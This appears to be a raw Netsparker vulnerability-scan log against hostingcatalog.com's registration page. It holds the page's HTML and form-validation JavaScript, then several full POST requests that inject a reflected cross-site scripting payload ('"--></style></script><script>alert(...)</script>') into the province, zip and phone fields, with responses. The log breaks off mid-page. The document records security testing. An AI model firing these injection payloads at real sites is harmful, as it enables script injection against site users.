HTTP/1.1 200 OK Date: Sun, 24 Apr 2011 13:17:22 GMT Server: Apache X-Powered-By: PHP/5.1.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Hosting Catalog - List Your Site</title> <link rel="stylesheet" type="text/css" href="style.css"> <SCRIPT LANGUAGE="JavaScript"> <!-- function isNumber(src) { src.value=src.value.replace('$',''); if (src.value.charAt(0)=='0') { alert("Please enter correct numeric value."); src.focus(); return false; } src.value=src.value.replace(',',''); if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.')); if (src.value.length==0) src.value='0'; if (parseInt(src.value)<25) { alert("There's a minimum $25 deposit."); src.value='25'; } var i = 0; strField=src.value; for (i=0;i<strField.length; i++) { if ((strField.charAt(i)<'0')||(strField.charAt(i)>'9')) { alert ('Please enter a numeric value.'); src.focus(); return false; } } strField=''; var j=0; for (i=src.value.length-1;i>=0;i--) { strField=src.value.charAt(i)+strField; if ((j+1)%3==0&&i!=0) strField=','+strField; j++; } src.value=strField+'.00'; return true; } // checks date on MM/YY format function checkDate(src) { //checking if year <2002 then card is expired var exp_date=src.value; pattern="[0-9]{2}(/)[0-9]{2}"; res=exp_date.search(pattern); if (res==-1) {alert('Wrong date format!'); src.focus(); return false;} dp = exp_date.split('/'); if ((dp[0]=='00')||(parseInt(dp[0])>12)||(dp[1]=='00')||(dp[1]=='01')) {alert('Wrong date format!'); src.focus(); return false;} return true; } function describe(num) { var url="http://www.hostingcatalog.com/bid_description.php/"+num; windowVar = 
window.open(url,'desc_win','width=250,height=210,location=0,toolbar=0,directories=0,status=0,menubar=0,scrollbars=0,resizable=1,channelmode=0,fullscreen=0'); windowVar.focus(); } function isMail(src) { src.value=src.value.toLowerCase(); addr=src.value; pattern="^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[_a-z0-9-]+(\.[_a-z0-9-]+)*(\.([a-z]{2,3}))+$"; res=addr.search(pattern); if (res==-1) { alert('Wrong mail format'); src.focus(); return false; } else return true; }// end isMail function isSame(src1,src2,str) { if (src1.value!=src2.value) { alert(str); src1.focus(); return false; } else return true; }// end isSame function isValidCardNumber(src) { var card_number=src.value; flag=true; pattern1="[0-9]{13,16}"; pattern2="[0-9]{4}(-)[0-9]{4}(-)[0-9]{4}(-)[0-9]{1,4}"; res=card_number.search(pattern1); if (res!=-1) { if (card_number.length>16) {flag=false;} } else { res=card_number.search(pattern2); if (res==-1) {flag=false;} if (card_number.length>19) {flag=false;} } if (!flag) { alert('Invalid credit card number'); src.focus(); return false; } else return true; }// end isValidCardNumber function phoneRequired(src) { var strField = new String(src.value); flag=true; if (strField=='') flag=false; /* for (i = 0; i < strField.length; i++) if (strField.charAt(i)!='-' && (strField.charAt(i) < '0' || strField.charAt(i) > '9')) { flag=false; } alert(strField.length); */ if (strField.length < 10) flag=false; if (!flag) { alert ('Please specify a correct phone number'); src.focus(); return false; } return true; }// phoneRequired function verify() { var f1=document.forms['billingForm']; if (!isMail(f1.elements['e_mail'])) return false; if (!isMail(f1.elements['retype_e_mail'])) return false; if (!isSame(f1.elements['password'],f1.elements['retype_password'],'Passwords must coincide!')) return false; if (!isSame(f1.elements['e_mail'],f1.elements['retype_e_mail'],'E-mail addresses must coincide!')) return false; if (f1.elements['company_name'].value=="") { alert('Not all fields are filled'); 
f1.elements['company_name'].focus(); return false; } if (f1.elements['first_name'].value=="") { alert('Not all fields are filled'); f1.elements['first_name'].focus(); return false; } if (f1.elements['last_name'].value=="") { alert('Not all fields are filled'); f1.elements['last_name'].focus(); return false; } if (f1.elements['address'].value=="") { alert('Not all fields are filled'); f1.elements['address'].focus(); return false; } if (f1.elements['city'].value=="") { alert('Not all fields are filled'); f1.elements['city'].focus(); return false; } if (f1.elements['state'].value=="") { alert('Not all fields are filled'); f1.elements['state'].focus(); return false; } if (f1.elements['zip'].value=="") { alert('Not all fields are filled'); f1.elements['zip'].focus(); return false; } if (f1.elements['password'].value=="") { alert('Not all fields are filled'); f1.elements['password'].focus(); return false; } if (!checkDate(f1.elements['expire_date'])) return false; if (!isValidCardNumber(f1.elements['card_number'])) return false; if (f1.elements['card_number'].value=="") { alert('Not all fields are filled'); f1.elements['card_number'].focus(); return false; } if (f1.elements['owner_first_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_first_name'].focus(); return false; } if (f1.elements['owner_last_name'].value=="") { alert('Not all fields are filled'); f1.elements['owner_last_name'].focus(); return false; } if (f1.elements['bill_address'].value=="") { alert('Not all fields are filled'); f1.elements['bill_address'].focus(); return false; } if (f1.elements['bill_city'].value=="") { alert('Not all fields are filled'); f1.elements['bill_city'].focus(); return false; } if (f1.elements['bill_country'].value=="") { alert('Not all fields are filled'); f1.elements['bill_country'].focus(); return false; } if (f1.elements['bill_zip'].value=="") { alert('Not all fields are filled'); f1.elements['bill_zip'].focus(); return false; } 
amount=f1.elements['deposit'].value; card=f1.elements['card_type'].options[f1.elements['card_type'].selectedIndex].text; if (confirm("You're about to charge $"+amount+" to your "+card+".")) return true; else return false; }// verify function checkType(src) { var val=src.options[src.selectedIndex].value; // if (val>1) {document.forms['billingForm'].elements['remember_info'].checked=true;} }// checkType function checkAgain(src) { var sel=document.forms['billingForm'].elements['account_type']; if (!src.checked) sel.selectedIndex=0; } function copyFromContact(src) { if (!src.checked) {return;} var f1=document.forms['billingForm']; f1.elements['bill_address'].value=f1.elements['address'].value; f1.elements['bill_address2'].value=f1.elements['address2'].value; f1.elements['bill_city'].value=f1.elements['city'].value; f1.elements['bill_zip'].value=f1.elements['zip'].value; f1.elements['bill_province'].value=f1.elements['province'].value; f1.elements['bill_state'].selectedIndex=f1.elements['state'].selectedIndex; f1.elements['bill_country'].selectedIndex=f1.elements['country'].selectedIndex; f1.elements['bill_phone'].value=f1.elements['phone'].value; } //--> </SCRIPT> </head> <body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"> <table width="98%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td background="images/header/header_bg.gif"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td rowspan="3" valign="top"><a href="/index.php"><img src="images/header/logo.gif" width="194" height="130" border="0"></a></td> <td width="100%" height="60" align="right" valign="top"><a href="http://www.liquidweb.com/"><img src="images/header/lw-header.png" width="270" height="36" alt="Liquid Web Logo" title="Liquid Web Hosting" style="border: 0;margin-top: 5px;" /></a></td> <td rowspan="3" align="right" valign="top"><img src="images/header/header_right.gif" width="1" height="130"></td> </tr> <tr> <td height="38" align="right"> <table 
border="0" cellpadding="0" cellspacing="0"> <form name="top_banner_form" style="margin:0px;" target="_blank" action="http://www.hostingcatalog.com/go.php"> <tr> <td valign="top"><img src="images/header/mostpopular.gif"></td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Unix/Linux</option> <option value='76E0188F5F077DBD79CEE1344E81E014C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Linux VPS Hosting</option><option value='76E0188F5F077DBD3829B56C84DB446F6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Host 5 sites for $5.95</option><option value='76E0188F5F077DBD88B48DAB7F673DA3C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBD1DED4319D52C43E1C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>1&1</option><option value='76E0188F5F077DBD3AEB7737981E079E6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Hosting 4 Less</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Dedicated Servers</option> <option value='76E0188F5F077DBD70EA0A8698940768C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>iWeb Technology</option><option value='76E0188F5F077DBDC5174EE31CCB164FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>SingleHop</option><option value='76E0188F5F077DBD6433DE7B6A438CC06F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Serverconnect@SwedishHost</option><option value='76E0188F5F077DBD4074D4240F273FFAC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>OnApp - Build Your Cloud</option><option value='76E0188F5F077DBD359D60F4959EF4EA6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>UnmeteredServers.com</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Budget and Free</option> 
<option value='76E0188F5F077DBDBF1CA61C835D753DC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>GlowHost $4.95 Hosting</option><option value='76E0188F5F077DBDA3FD3054E6499774C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Unlimited Hosting $2.99/m</option><option value='76E0188F5F077DBDDF40A8443749054FC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>HostingLocker</option><option value='76E0188F5F077DBD9525D662F64EC9CBC0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Cast-Iron Hosting Review</option><option value='76E0188F5F077DBD331E720CDFEB85D8C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>Web Hosting High</option> </select> </td> <td> <select name="select" onChange="goBannerLink(this);" class="dropdown"> <option value="0">Wholesale/Reseller</option> <option value='76E0188F5F077DBDB19226DB6ADDE145C0FDE47AE4BDD9EDE292061C8522447BB64A64EAA3C40BDD819F623147C54EAD'>resell merchant accounts</option><option value='76E0188F5F077DBDD3D3DF567C5CFF016F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>Cheap Reseller Hosting</option><option value='76E0188F5F077DBD38B2D705D5B70C6D6F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>PremiumReseller.com</option><option value='76E0188F5F077DBDB0C2EC9A094642A46F3F9242D08A55A8E7ACE56EBA9E937B92A1428829B83F5E40F262C13DAF91B6'>30 Day FREE Reseller</option> </select> <input type="hidden" name="param" value=""> </td> </tr> </form> </table> </td> </tr> <tr> <td height="32" align="right" class="headerlink"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td class="headerlink"><a href="index.php">Home</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink">List Your Company</td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/advertiseradnetwork.txt">Ad Network</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a 
href="advert_login.php">Advertiser Login</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="file.php/adnetworkpartnerprogram.txt">Become a Partner</a></td> <td><img src="images/header/nav_divider.gif"></td> <td class="headerlink"><a href="partner">Partner Login</a></td> <td> </td> </tr> </table> </td> </tr> </table> </td> </tr> <tr> <td valign="top"> <div class="regform_intro"> <style type"text/css"> p { font-size: 14px; font-family: arial, verdanna, sans-serif; } h2 { font-size: 16px; font-family: arial, verdanna, sans-serif; font-style: bold; } td.body { color : #000000; font-family : Arial, Tahoma, sans-serif; font-size : 14px; } </style> <h2>Create A Hosting Catalog Account</h2> <p>Wise choice! By listing your web hosting company at Hosting Catalog, you will receive well qualified, targeted traffic from hundreds of people in need of web hosting solutions.</p> <p>There is a minimum deposit of $25 per account and a minimum bid of $.05 per listing. </p> <p>For optimal results, include your listings in the <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt"><b>Hosting Catalog Ad Network</b></a>. We hand pick the sites in our network, so they are perfectly targeted towards those who are looking for web hosting services. Plus, you'll spend up to 300% less than you would using the big search ad network programs and get exposure to millions of potential hosting customers each month! Just make sure your bids meet the minimum amount for inclusion in the ad network. You can find this info <a href="http://www.hostingcatalog.com/file.php/advertiseradnetwork.txt">here</a></p> <p>Paying through PayPal? <a href="https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=paypal%40inetinteractive%2ecom&item_name=Hosting%20Catalog%20Deposit&no_shipping=0&no_note=1&currency_code=USD&lc=US&bn=PP%2dBuyNowBF&charset=UTF%2d8" target="new"><b>Send us your deposit via PayPal</b></a>. 
(Our PayPal address is paypal@hostingcatalog.com. Please specify your Hosting Catalog account email if it is different from your PayPal email). </p> <p>Don't worry; your information is safe with us. <b>We respect your privacy and will never sell of give any of your information to a 3rd party.</b></p> <p>Complete the contact and payment information forms below to get your account started and the targeted traffic streaming in!</p> </div> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="10"><img src="images/misc/spacer.gif" width="10" height="1"></td> <td width="100%" valign="top"> <span class="redstar">*</span> <strong>There is a minimum $25 deposit. </strong> <form action="https://www.hostingcatalog.com/register.php" method="post" name="billingForm" onSubmit="return verify();"> <table> <tr> <td valign="top"> <table cellpadding="1" cellspacing="1" border="0" width="100%"> <tr align="left" valign="top" bgcolor="#E1E1E1"> <td class="body"> <B>CONTACT INFORMATION</B></td> </tr> <tr align="left" valign="top"> <td class="body" width="400" nowrap> <table width="100%" border="0" cellspacing="3" cellpadding="0"> <tr> <td class="body" align="left" width="160" nowrap><span class="redstar">*</span>Company Name:</td> <td> <input class="textfield" type="text" name="company_name" size="20" maxlength="30" value="Smith"> <..
Parameters
| Parameter | Type | Value |
|---|---|---|
| company_name | POST | Smith |
| first_name | POST | Smith |
| last_name | POST | Smith |
| address | POST | 3 |
| address2 | POST | 3 |
| city | POST | 3 |
| state | POST | 3 |
| province | POST | '"--></style></script><script>alert(0x001D99)</script> |
| zip | POST | 3 |
| country | POST | 225 |
| phone | POST | 3 |
| e_mail | POST | netsparker@example.com |
| retype_e_mail | POST | netsparker@example.com |
| password | POST | 3 |
| retype_password | POST | 3 |
| account_type | POST | 1 |
| deposit | POST | 3 |
| promo_code | POST | 3 |
| card_type | POST | 1 |
| card_number | POST | 3 |
| expire_date | POST | 3 |
| owner_first_name | POST | Smith |
| owner_last_name | POST | Smith |
| bill_address | POST | 3 |
| bill_address2 | POST | 3 |
| bill_city | POST | 3 |
| bill_state | POST | 3 |
| bill_province | POST | 3 |
| bill_zip | POST | 3 |
| bill_country | POST | 225 |
| bill_phone | POST | 3 |
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24
Content-Length: 544
Accept-Encoding: gzip, deflate

company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D99)%3c%2fscript%3e&zip=3&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 13:17:34 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Parameters
| Parameter | Type | Value |
|---|---|---|
| company_name | POST | Smith |
| first_name | POST | Smith |
| last_name | POST | Smith |
| address | POST | 3 |
| address2 | POST | 3 |
| city | POST | 3 |
| state | POST | 3 |
| province | POST | 3 |
| zip | POST | '"--></style></script><script>alert(0x001D9A)</script> |
| country | POST | 225 |
| phone | POST | 3 |
| e_mail | POST | netsparker@example.com |
| retype_e_mail | POST | netsparker@example.com |
| password | POST | 3 |
| retype_password | POST | 3 |
| account_type | POST | 1 |
| deposit | POST | 3 |
| promo_code | POST | 3 |
| card_type | POST | 1 |
| card_number | POST | 3 |
| expire_date | POST | 3 |
| owner_first_name | POST | Smith |
| owner_last_name | POST | Smith |
| bill_address | POST | 3 |
| bill_address2 | POST | 3 |
| bill_city | POST | 3 |
| bill_state | POST | 3 |
| bill_province | POST | 3 |
| bill_zip | POST | 3 |
| bill_country | POST | 225 |
| bill_phone | POST | 3 |
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24
Content-Length: 544
Accept-Encoding: gzip, deflate

company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001D9A)%3c%2fscript%3e&country=225&phone=3&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 13:17:37 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Parameters
| Parameter | Type | Value |
|---|---|---|
| company_name | POST | Smith |
| first_name | POST | Smith |
| last_name | POST | Smith |
| address | POST | 3 |
| address2 | POST | 3 |
| city | POST | 3 |
| state | POST | 3 |
| province | POST | 3 |
| zip | POST | 3 |
| country | POST | 225 |
| phone | POST | `'"--></style></script><script>alert(0x001DAA)</script>` |
| e_mail | POST | netsparker@example.com |
| retype_e_mail | POST | netsparker@example.com |
| password | POST | 3 |
| retype_password | POST | 3 |
| account_type | POST | 1 |
| deposit | POST | 3 |
| promo_code | POST | 3 |
| card_type | POST | 1 |
| card_number | POST | 3 |
| expire_date | POST | 3 |
| owner_first_name | POST | Smith |
| owner_last_name | POST | Smith |
| bill_address | POST | 3 |
| bill_address2 | POST | 3 |
| bill_city | POST | 3 |
| bill_state | POST | 3 |
| bill_province | POST | 3 |
| bill_zip | POST | 3 |
| bill_country | POST | 225 |
| bill_phone | POST | 3 |
Request
POST /register.php HTTP/1.1
Referer: http://www.hostingcatalog.com/register.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.hostingcatalog.com
Cookie: PHPSESSID=q4ng668a9p90m7ni0dh1sbljb4; time_0=1303648060; user_counted_0=%3CAND%3E29%3CAND%3E24
Content-Length: 544
Accept-Encoding: gzip, deflate

company_name=Smith&first_name=Smith&last_name=Smith&address=3&address2=3&city=3&state=3&province=3&zip=3&country=225&phone='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x001DAA)%3c%2fscript%3e&e_mail=netsparker%40example.com&retype_e_mail=netsparker%40example.com&password=3&retype_password=3&account_type=1&deposit=3&promo_code=3&card_type=1&card_number=3&expire_date=3&owner_first_name=Smith&owner_last_name=Smith&bill_address=3&bill_address2=3&bill_city=3&bill_state=3&bill_province=3&bill_zip=3&bill_country=225&bill_phone=3
Response
HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 13:17:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Hosting Catalog - List Your Site</title>
<link rel="stylesheet" type="text/css" href="style.css">
<SCRIPT LANGUAGE="JavaScript">
<!--
function isNumber(src) {
  src.value=src.value.replace('$','');
  if (src.value.charAt(0)=='0') {
    alert("Please enter correct numeric value.");
    src.focus();
    return false;
  }
  src.value=src.value.replace(',','');
  if (src.value.indexOf('.')!=-1) src.value=src.value.substr(0,src.value.indexOf('.'));
  if (src.value.length==0) src.value='0';
  if (